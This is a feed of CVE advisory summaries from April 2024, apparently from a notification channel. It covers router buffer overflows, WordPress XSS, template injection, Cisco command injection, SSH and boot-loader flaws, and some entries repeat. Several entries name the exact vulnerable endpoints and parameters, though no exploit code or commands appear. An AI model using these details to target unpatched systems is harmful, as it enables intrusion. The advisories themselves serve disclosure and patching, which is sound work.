🚨 CVE-2023-47252An issue was discovered in PnpSmm in Insyde InsydeH2O with kernel 5.0 through 5.6. There is a possible out-of-bounds access in the SMM communication buffer, leading to tampering. The PNP-related SMI sub-functions do not verify data size before getting it from the communication buffer, which could lead to possible circumstances where the data immediately following the command buffer could be destroyed with a fixed value. This is fixed in kernel 5.2 v05.28.45, kernel 5.3 v05.37.45, kernel 5.4 v05.45.45, kernel 5.5 v05.53.45, and kernel 5.6 v05.60.45.🎖@cveNotify |
|
| 2024-04-26 01:37:32 |
🚨 CVE-2024-33669An issue was discovered in Passbolt Browser Extension before 4.6.2. It can send multiple requests to HaveIBeenPwned while a password is being typed, which results in an information leak. This allows an attacker capable of observing Passbolt's HTTPS queries to the Pwned Password API to more easily brute force passwords that are manually typed by the user.🎖@cveNotify |
|
| 2024-04-26 01:37:26 |
🚨 CVE-2024-33668An issue was discovered in Zammad before 6.3.0. The Zammad Upload Cache uses insecure, partially guessable FormIDs to identify content. An attacker could try to brute force them to upload malicious content to article drafts they have no access to.🎖@cveNotify |
|
| 2024-04-26 01:37:25 |
🚨 CVE-2024-33665angular-translate through 2.19.1 allows XSS via a crafted key that is used by the translate directive. NOTE: the vendor indicates that there is no documentation indicating that a key is supposed to be safe against XSS attacks.🎖@cveNotify |
|
| 2024-04-26 01:37:24 |
🚨 CVE-2022-48682In deletefiles in FDUPES before 2.2.0, a TOCTOU race condition allows arbitrary file deletion via a symlink.🎖@cveNotify |
|
| 2024-04-26 01:07:25 |
🚨 CVE-2024-20353A vulnerability in the management and VPN web servers for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to incomplete error checking when parsing an HTTP header. An attacker could exploit this vulnerability by sending a crafted HTTP request to a targeted web server on a device. A successful exploit could allow the attacker to cause a DoS condition when the device reloads.🎖@cveNotify |
|
| 2024-04-26 01:07:24 |
🚨 CVE-2024-4040A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.🎖@cveNotify |
|
| 2024-04-26 00:37:29 |
🚨 CVE-2024-33664python-jose through 3.3.0 allows attackers to cause a denial of service (resource consumption) during a decode via a crafted JSON Web Encryption (JWE) token with a high compression ratio, aka a "JWT bomb." This is similar to CVE-2024-21319.🎖@cveNotify |
|
| 2024-04-26 00:37:26 |
🚨 CVE-2024-33663python-jose through 3.3.0 has algorithm confusion with OpenSSH ECDSA keys and other key formats. This is similar to CVE-2022-29217.🎖@cveNotify |
|
| 2024-04-26 00:37:25 |
🚨 CVE-2024-32651changedetection.io is an open source web page change detection, website watcher, restock monitor and notification service. There is a Server Side Template Injection (SSTI) in Jinja2 that allows Remote Command Execution on the server host. Attackers can run any system command without any restriction and they could use a reverse shell. The impact is critical as the attacker can completely takeover the server machine. This can be reduced if changedetection is behind a login page, but this isn't required by the application (not by default and not enforced).🎖@cveNotify |
|
| 2024-04-26 00:37:24 |
🚨 CVE-2024-29964Brocade SANnav versions before v2.3.0a do not correctly set permissions on files, including docker files. An unprivileged attacker who gains access to the server can read sensitive information from these files.🎖@cveNotify |
|
| 2024-04-25 23:37:25 |
🚨 CVE-2024-4173A vulnerability in Brocade SANnav exposes Kafka in the wan interface.The vulnerability could allow an unauthenticated attacker to perform various attacks, including DOS against the Brocade SANnav.🎖@cveNotify |
|
| 2024-04-25 23:37:24 |
🚨 CVE-2024-4159Brocade SANnav before v2.3.0a lacks protection mechanisms on port 2377/TCP and 7946/TCP, which could allow an unauthenticated attacker to sniff the SANnav Docker information.🎖@cveNotify |
|
| 2024-04-25 22:37:32 |
🚨 CVE-2024-3265The Advanced Search WordPress plugin through 1.1.6 does not properly escape parameters appended to an SQL query, making it possible for users with the administrator role to conduct SQL Injection attacks in the context of a multisite WordPress configurations.🎖@cveNotify |
|
| 2024-04-25 22:37:31 |
🚨 CVE-2024-31610File Upload vulnerability in the function for employees to upload avatars in Code-Projects Simple School Management System v1.0 allows attackers to run arbitrary code via upload of crafted file.🎖@cveNotify |
|
| 2024-04-25 22:37:27 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2024-04-25 22:37:26 |
🚨 CVE-2019-17069PuTTY before 0.73 might allow remote SSH-1 servers to cause a denial of service by accessing freed memory locations via an SSH1_MSG_DISCONNECT message.🎖@cveNotify |
|
| 2024-04-25 21:37:25 |
🚨 CVE-2022-36028Greenlight is an end-user interface for BigBlueButton servers. Versions prior to 2.13.0 have an open redirect vulnerability in the Login page due to unchecked the value of the `return_to` cookie. Versions 2.13.0 contains a patch for the issue.🎖@cveNotify |
|
| 2024-04-25 21:37:24 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-04-25 20:37:25 |
🚨 CVE-2024-32324Buffer Overflow vulnerability in Shenzhen Libituo Technology Co., Ltd LBT-T300-T400 v.3.2 allows a local attacker to execute arbitrary code via the vpn_client_ip variable of the config_vpn_pptp function in rc program.🎖@cveNotify |
|
| 2024-04-25 20:37:24 |
🚨 CVE-2024-31615ThinkCMF 6.0.9 is vulnerable to File upload via UeditorController.php.🎖@cveNotify |
|
| 2024-04-25 17:37:44 |
🚨 CVE-2024-1139A credentials leak vulnerability was found in the cluster monitoring operator in OCP. This issue may allow a remote attacker who has basic login credentials to check the pod manifest to discover a repository pull secret.🎖@cveNotify |
|
| 2024-04-25 17:37:43 |
🚨 CVE-2024-0874A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.🎖@cveNotify |
|
| 2024-04-25 17:37:42 |
🚨 CVE-2023-6717A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.🎖@cveNotify |
|
| 2024-04-25 17:37:38 |
🚨 CVE-2023-6544A flaw was found in the Keycloak package. This issue occurs due to a permissive regular expression hardcoded for filtering which allows hosts to register a dynamic client. A malicious user with enough information about the environment could jeopardize an environment with this specific Dynamic Client Registration and TrustedDomain configuration previously unauthorized.🎖@cveNotify |
|
| 2024-04-25 17:37:37 |
🚨 CVE-2023-5675A flaw was found in Quarkus. When a Quarkus RestEasy Classic or Reactive JAX-RS endpoint has its methods declared in the abstract Java class or customized by Quarkus extensions using the annotation processor, the authorization of these methods will not be enforced if it is enabled by either 'quarkus.security.jaxrs.deny-unannotated-endpoints' or 'quarkus.security.jaxrs.default-roles-allowed' properties.🎖@cveNotify |
|
| 2024-04-25 17:37:36 |
🚨 CVE-2024-33592Server-Side Request Forgery (SSRF) vulnerability in SoftLab Radio Player.This issue affects Radio Player: from n/a through 2.0.73.🎖@cveNotify |
|
| 2024-04-25 17:37:32 |
🚨 CVE-2024-22391A heap-based buffer overflow vulnerability exists in the LookupTable::SetLUT functionality of Mathieu Malaterre Grassroot DICOM 3.0.23. A specially crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-25 17:37:31 |
🚨 CVE-2024-4172A vulnerability classified as problematic was found in idcCMS 1.35. Affected by this vulnerability is an unknown functionality of the file /admin/admin_cl.php?mudi=revPwd. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261991.🎖@cveNotify |
|
| 2024-04-25 17:37:30 |
🚨 CVE-2024-4171A vulnerability classified as critical has been found in Tenda W30E 1.0/1.0.1.25. Affected is the function fromWizardHandle of the file /goform/WizardHandle. The manipulation of the argument PPW leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-261990 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-25 17:37:27 |
🚨 CVE-2024-4024An issue has been discovered in GitLab CE/EE affecting all versions starting from 7.8 before 16.9.6, all versions starting from 16.10 before 16.10.4, all versions starting from 16.11 before 16.11.1. Under certain conditions, an attacker with their Bitbucket account credentials may be able to take over a GitLab account linked to another user's Bitbucket account, if Bitbucket is used as an OAuth 2.0 provider on GitLab.🎖@cveNotify |
|
| 2024-04-25 17:37:26 |
🚨 CVE-2024-2236A timing-based side-channel flaw was found in libgcrypt's RSA implementation. This issue may allow a remote attacker to initiate a Bleichenbacher-style attack, which can lead to the decryption of RSA ciphertexts.🎖@cveNotify |
|
| 2024-04-25 17:37:25 |
🚨 CVE-2024-0914A timing side-channel vulnerability has been discovered in the opencryptoki package while processing RSA PKCS#1 v1.5 padded ciphertexts. This flaw could potentially enable unauthorized RSA ciphertext decryption or signing, even without access to the corresponding private key.🎖@cveNotify |
|
| 2024-04-25 17:37:24 |
🚨 CVE-2023-7192A memory leak problem was found in ctnetlink_create_conntrack in net/netfilter/nf_conntrack_netlink.c in the Linux Kernel. This issue may allow a local attacker with CAP_NET_ADMIN privileges to cause a denial of service (DoS) attack due to a refcount overflow.🎖@cveNotify |
|
| 2024-04-25 15:37:33 |
🚨 CVE-2024-33592Server-Side Request Forgery (SSRF) vulnerability in SoftLab Radio Player.This issue affects Radio Player: from n/a through 2.0.73.🎖@cveNotify |
|
| 2024-04-25 15:37:29 |
🚨 CVE-2024-22391A heap-based buffer overflow vulnerability exists in the LookupTable::SetLUT functionality of Mathieu Malaterre Grassroot DICOM 3.0.23. A specially crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-25 15:37:28 |
🚨 CVE-2023-5189A path traversal vulnerability exists in Ansible when extracting tarballs. An attacker could craft a malicious tarball so that when using the galaxy importer of Ansible Automation Hub, a symlink could be dropped on the disk, resulting in files being overwritten.🎖@cveNotify |
|
| 2024-04-25 15:37:27 |
🚨 CVE-2023-3243** UNSUPPORTED WHEN ASSIGNED ** [An attacker can capture an authenticating hashand utilize it to create new sessions. The hash is also a poorly salted MD5hash, which could result in a successful brute force password attack. Impacted product is BCM-WEB version 3.3.X. Recommended fix: Upgrade to a supported product suchas AlertonACM.] Out of an abundance of caution, this CVE ID is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.🎖@cveNotify |
|
| 2024-04-25 14:37:37 |
🚨 CVE-2024-4171A vulnerability classified as critical has been found in Tenda W30E 1.0/1.0.1.25. Affected is the function fromWizardHandle of the file /goform/WizardHandle. The manipulation of the argument PPW leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-261990 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-25 14:37:36 |
🚨 CVE-2024-4024An issue has been discovered in GitLab CE/EE affecting all versions starting from 7.8 before 16.9.6, all versions starting from 16.10 before 16.10.4, all versions starting from 16.11 before 16.11.1. Under certain conditions, an attacker with their Bitbucket account credentials may be able to take over a GitLab account linked to another user's Bitbucket account, if Bitbucket is used as an OAuth 2.0 provider on GitLab.🎖@cveNotify |
|
| 2024-04-25 14:37:32 |
🚨 CVE-2023-1841Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Honeywell MPA2 Access Panel (Web server modules) allows XSS Using Invalid Characters.This issue affects MPA2 Access Panel all version prior to R1.00.08.05. Honeywell released firmware update package MPA2 firmware R1.00.08.05 which addresses this vulnerability. This version and all later versionscorrect the reported vulnerability.🎖@cveNotify |
|
| 2024-04-25 14:37:31 |
🚨 CVE-2023-40550An out-of-bounds read flaw was found in Shim when it tried to validate the SBAT information. This issue may expose sensitive data during the system's boot phase.🎖@cveNotify |
|
| 2024-04-25 14:37:30 |
🚨 CVE-2023-40549An out-of-bounds read flaw was found in Shim due to the lack of proper boundary verification during the load of a PE binary. This flaw allows an attacker to load a crafted PE binary, triggering the issue and crashing Shim, resulting in a denial of service.🎖@cveNotify |
|
| 2024-04-25 14:37:27 |
🚨 CVE-2023-40546A flaw was found in Shim when an error happened while creating a new ESL variable. If Shim fails to create the new variable, it tries to print an error message to the user; however, the number of parameters used by the logging function doesn't match the format string used by it, leading to a crash under certain circumstances.🎖@cveNotify |
|
| 2024-04-25 14:37:26 |
🚨 CVE-2023-40548A buffer overflow was found in Shim in the 32-bit system. The overflow happens due to an addition operation involving a user-controlled value parsed from the PE binary being used by Shim. This value is further used for memory allocation operations, leading to a heap-based buffer overflow. This flaw causes memory corruption and can lead to a crash or data integrity issues during the boot phase.🎖@cveNotify |
|
| 2024-04-25 14:37:25 |
🚨 CVE-2023-4320An arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system's integrity.🎖@cveNotify |
|
| 2024-04-25 14:37:24 |
🚨 CVE-2023-4459A NULL pointer dereference flaw was found in vmxnet3_rq_cleanup in drivers/net/vmxnet3/vmxnet3_drv.c in the networking sub-component in vmxnet3 in the Linux Kernel. This issue may allow a local attacker with normal user privilege to cause a denial of service due to a missing sanity check during cleanup.🎖@cveNotify |
|
| 2024-04-25 12:37:33 |
🚨 CVE-2024-4175Unicode transformation vulnerability in Hyperion affecting version 2.0.15. This vulnerability could allow an attacker to send a malicious payload with Unicode characters that will be replaced by ASCII characters.🎖@cveNotify |
|
| 2024-04-25 12:37:29 |
🚨 CVE-2024-4174Cross-Site Scripting (XSS) vulnerability in Hyperion Web Server affecting version 2.0.15. This vulnerability could allow an attacker to execute malicious Javascript code on the client by injecting that code into the URL.🎖@cveNotify |
|
| 2024-04-25 12:37:28 |
🚨 CVE-2024-4167A vulnerability was found in Tenda 4G300 1.01.42 and classified as critical. Affected by this issue is the function sub_422AA4. The manipulation of the argument year/month/day/hour/minute/second leads to stack-based buffer overflow. The attack may be launched remotely. VDB-261986 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-25 12:37:27 |
🚨 CVE-2024-4165A vulnerability, which was classified as critical, was found in Tenda G3 15.11.0.17(9502). Affected is the function modifyDhcpRule of the file /goform/modifyDhcpRule. The manipulation of the argument bindDhcpIndex leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261984. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-25 11:37:30 |
🚨 CVE-2024-3730The Simple Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'swpm_paypal_subscription_cancel_link' shortcode in all versions up to, and including, 4.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-25 11:37:26 |
🚨 CVE-2024-32676Improper Restriction of Excessive Authentication Attempts vulnerability in LoginPress LoginPress Pro.This issue affects LoginPress Pro: from n/a before 3.0.0.🎖@cveNotify |
|
| 2024-04-25 11:37:25 |
🚨 CVE-2024-1347An issue has been discovered in GitLab CE/EE affecting all versions before 16.9.6, all versions starting from 16.10 before 16.10.4, all versions starting from 16.11 before 16.11.1. Under certain conditions, an attacker through a crafted email address may be able to bypass domain based restrictions on an instance or a group.🎖@cveNotify |
|
| 2024-04-25 11:37:24 |
🚨 CVE-2024-32677Missing Authorization vulnerability in LoginPress LoginPress Pro.This issue affects LoginPress Pro: from n/a before 3.0.0.🎖@cveNotify |
|
| 2024-04-25 10:37:31 |
🚨 CVE-2024-4077Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AndonDesign UDesign allows Reflected XSS.This issue affects UDesign: from n/a through 4.7.3.🎖@cveNotify |
|
| 2024-04-25 10:37:27 |
🚨 CVE-2024-4035The Photo Gallery – GT3 Image Gallery & Gutenberg Block Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image alt text in all versions up to, and including, 2.7.7.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-25 10:37:26 |
🚨 CVE-2024-32961Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Creative Themes HQ Blocksy allows Stored XSS.This issue affects Blocksy: from n/a through 2.0.33.🎖@cveNotify |
|
| 2024-04-25 10:37:25 |
🚨 CVE-2024-25583A crafted response from an upstream server the recursor has been configured to forward-recurse to can cause a Denial of Service in the Recursor. The default configuration of the Recursor does not use recursive forwarding and is not affected.🎖@cveNotify |
|
| 2024-04-25 10:37:24 |
🚨 CVE-2023-52220Missing Authorization vulnerability in MonsterInsights Google Analytics by Monster Insights.This issue affects Google Analytics by Monster Insights: from n/a through 8.21.0.🎖@cveNotify |
|
| 2024-04-25 09:37:31 |
🚨 CVE-2024-31266Improper Control of Generation of Code ('Code Injection') vulnerability in AlgolPlus Advanced Order Export For WooCommerce allows Code Injection.This issue affects Advanced Order Export For WooCommerce: from n/a through 3.4.4.🎖@cveNotify |
|
| 2024-04-25 09:37:30 |
🚨 CVE-2024-30560Cross-Site Request Forgery (CSRF) vulnerability in 大侠WP DX-Watermark.This issue affects DX-Watermark: from n/a through 1.0.4.🎖@cveNotify |
|
| 2024-04-25 09:37:26 |
🚨 CVE-2023-51484Improper Authentication vulnerability in wp-buy Login as User or Customer (User Switching) allows Privilege Escalation.This issue affects Login as User or Customer (User Switching): from n/a through 3.8.🎖@cveNotify |
|
| 2024-04-25 09:37:25 |
🚨 CVE-2024-31380Improper Control of Generation of Code ('Code Injection') vulnerability in Soflyy Oxygen Builder allows Code Injection.This issue affects Oxygen Builder: from n/a through 4.8.2.🎖@cveNotify |
|
| 2024-04-25 08:37:30 |
🚨 CVE-2024-4173A vulnerability in Brocade SANnav ova versions before Brocade SANnav v2.3.1 and v2.3.0a exposes Kafka in the wan interface.The vulnerability could allow an unauthenticated attacker to perform various attacks, including DOS, the Brocade SANnav appliance.🎖@cveNotify |
|
| 2024-04-25 08:37:27 |
🚨 CVE-2024-3988The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Sina Fancy Text Widget in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-25 08:37:26 |
🚨 CVE-2024-3893The Classified Listing – Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the rtcl_fb_gallery_image_delete AJAX action in all versions up to, and including, 3.0.10.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary attachements.🎖@cveNotify |
|
| 2024-04-25 08:37:25 |
🚨 CVE-2023-51478Improper Authentication vulnerability in Abdul Hakeem Build App Online allows Privilege Escalation.This issue affects Build App Online: from n/a through 1.0.19.🎖@cveNotify |
|
| 2024-04-25 08:37:24 |
🚨 CVE-2024-0151Insufficient argument checking in Secure state Entry functions in software using Cortex-M Security Extensions (CMSE), that has been compiled using toolchains that implement 'Arm v8-M Security Extensions Requirements on Development Tools' prior to version 1.4, allows an attacker to pass values to Secure state that are out of range for types smaller than 32-bits. Out of range values might lead to incorrect operations in secure state.🎖@cveNotify |
|
| 2024-04-25 07:37:27 |
🚨 CVE-2023-6237Issue summary: Checking excessively long invalid RSA public keys may takea long time.Impact summary: Applications that use the function EVP_PKEY_public_check()to check RSA public keys may experience long delays. Where the key thatis being checked has been obtained from an untrusted source this may leadto a Denial of Service.When function EVP_PKEY_public_check() is called on RSA public keys,a computation is done to confirm that the RSA modulus, n, is composite.For valid RSA keys, n is a product of two or more large primes and thiscomputation completes quickly. However, if n is an overly large prime,then this computation would take a long time.An application that calls EVP_PKEY_public_check() and supplies an RSA keyobtained from an untrusted source could be vulnerable to a Denial of Serviceattack.The function EVP_PKEY_public_check() is not called from other OpenSSLfunctions however it is called from the OpenSSL pkey command lineapplication. For that reason that application is also vulnerable if usedwith the '-pubin' and '-check' options on untrusted data.The OpenSSL SSL/TLS implementation is not affected by this issue.The OpenSSL 3.0 and 3.1 FIPS providers are affected by this issue.🎖@cveNotify |
|
| 2024-04-24 20:37:31 |
🚨 CVE-2024-4127A vulnerability was found in Tenda W15E 15.11.0.14. It has been classified as critical. Affected is the function guestWifiRuleRefresh. The manipulation of the argument qosGuestDownstream leads to stack-based buffer overflow. It is possible to launch the attack remotely. VDB-261870 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-24 20:37:27 |
🚨 CVE-2024-4126A vulnerability was found in Tenda W15E 15.11.0.14 and classified as critical. This issue affects the function formSetSysTime of the file /goform/SetSysTimeCfg. The manipulation of the argument manualTime leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-261869 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-24 20:37:26 |
🚨 CVE-2024-20358A vulnerability in the Cisco Adaptive Security Appliance (ASA) restore functionality that is available in Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system with root-level privileges. Administrator-level privileges are required to exploit this vulnerability. This vulnerability exists because the contents of a backup file are improperly sanitized at restore time. An attacker could exploit this vulnerability by restoring a crafted backup file to an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system as root.🎖@cveNotify |
|
| 2024-04-24 20:37:25 |
🚨 CVE-2024-20356A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker with Administrator-level privileges to perform command injection attacks on an affected system and elevate their privileges to root. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of the affected software. A successful exploit could allow the attacker to elevate their privileges to root.🎖@cveNotify |
|
| 2024-04-24 20:37:24 |
🚨 CVE-2024-20295A vulnerability in the CLI of the Cisco Integrated Management Controller (IMC) could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have read-only or higher privileges on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root.🎖@cveNotify |
|
| 2024-04-24 20:07:38 |
🚨 CVE-2024-4141Out-of-bounds array write in Xpdf 4.05 and earlier, triggered by an invalid character code in a Type 1 font. The root problem was a bounds check that was being optimized away by modern compilers.🎖@cveNotify |
|
| 2024-04-24 20:07:34 |
🚨 CVE-2024-4124A vulnerability, which was classified as critical, was found in Tenda W15E 15.11.0.14. This affects the function formSetRemoteWebManage of the file /goform/SetRemoteWebManage. The manipulation of the argument remoteIP leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261867. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-24 20:07:33 |
🚨 CVE-2024-32876NewPipe is an Android app for video streaming written in Java. It supports exporting and importing backups, as a way to let users move their data to a new device effortlessly. However, in versions 0.13.4 through 0.26.1, importing a backup file from an untrusted source could have resulted in Arbitrary Code Execution. This is because backups are serialized/deserialized using Java's Object Serialization Stream Protocol, which can allow constructing any class in the app, unless properly restricted.To exploit this vulnerability, an attacker would need to build a backup file containing the exploit, and then persuade a user into importing it. During the import process, the malicious code would be executed, possibly crashing the app, stealing user data from the NewPipe app, performing nasty actions through Android APIs, and attempting Android JVM/Sandbox escapes through vulnerabilities in the Android OS.The attack can take place only if the user imports a malicious backup file, so an attacker would need to trick a user into importing a backup file from a source they can control. The implementation details of the malicious backup file can be independent of the attacked user or the device they are being run on, and do not require additional privileges.All NewPipe versions from 0.13.4 to 0.26.1 are vulnerable. NewPipe version 0.27.0 fixes the issue by doing the following: Restrict the classes that can be deserialized when calling Java's Object Serialization Stream Protocol, by adding a whitelist with only innocuous data-only classes that can't lead to Arbitrary Code Execution; deprecate backups serialized with Java's Object Serialization Stream Protocol; use JSON serialization for all newly created backups (but still include an alternative file serialized with Java's Object Serialization Stream Protocol in the backup zip for backwards compatibility); show a warning to the user when attempting to import a backup where the only available serialization mode is Java's Object Serialization Stream Protocol (note that in the future this serialization mode will be removed completely).🎖@cveNotify |
|
| 2024-04-24 20:07:32 |
🚨 CVE-2024-20359A vulnerability in a legacy capability that allowed for the preloading of VPN clients and plug-ins and that has been available in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. Administrator-level privileges are required to exploit this vulnerability. This vulnerability is due to improper validation of a file when it is read from system flash memory. An attacker could exploit this vulnerability by copying a crafted file to the disk0: file system of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the affected device after the next reload of the device, which could alter system behavior. Because the injected code could persist across device reboots, Cisco has raised the Security Impact Rating (SIR) of this advisory from Medium to High.🎖@cveNotify |
|
| 2024-04-24 20:07:28 |
🚨 CVE-2024-4122A vulnerability classified as critical was found in Tenda W15E 15.11.0.14. Affected by this vulnerability is the function formSetDebugCfg of the file /goform/setDebugCfg. The manipulation of the argument enable/level/module leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-261865 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-24 20:07:27 |
🚨 CVE-2024-4120A vulnerability was found in Tenda W15E 15.11.0.14. It has been rated as critical. This issue affects the function formIPMacBindModify of the file /goform/modifyIpMacBind. The manipulation of the argument IPMacBindRuleId/IPMacBindRuleIp/IPMacBindRuleMac/IPMacBindRuleRemark leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261863. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-24 20:07:26 |
🚨 CVE-2024-0151Insufficient argument checking in Secure state Entry functions in software using Cortex-M Security Extensions (CMSE), that has been compiled using toolchains that implement 'Arm v8-M Security Extensions Requirements on Development Tools' prior to version 1.4, allows an attacker to pass values to Secure state that are out of range for types smaller than 32-bits. Out of range values might lead to incorrect operations in secure state due.🎖@cveNotify |
|
| 2024-04-24 19:37:31 |
🚨 CVE-2024-4125A vulnerability has been found in Tenda W15E 15.11.0.14 and classified as critical. This vulnerability affects the function formSetStaticRoute of the file /goform/setStaticRoute. The manipulation of the argument staticRouteIndex leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261868. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-24 19:37:30 |
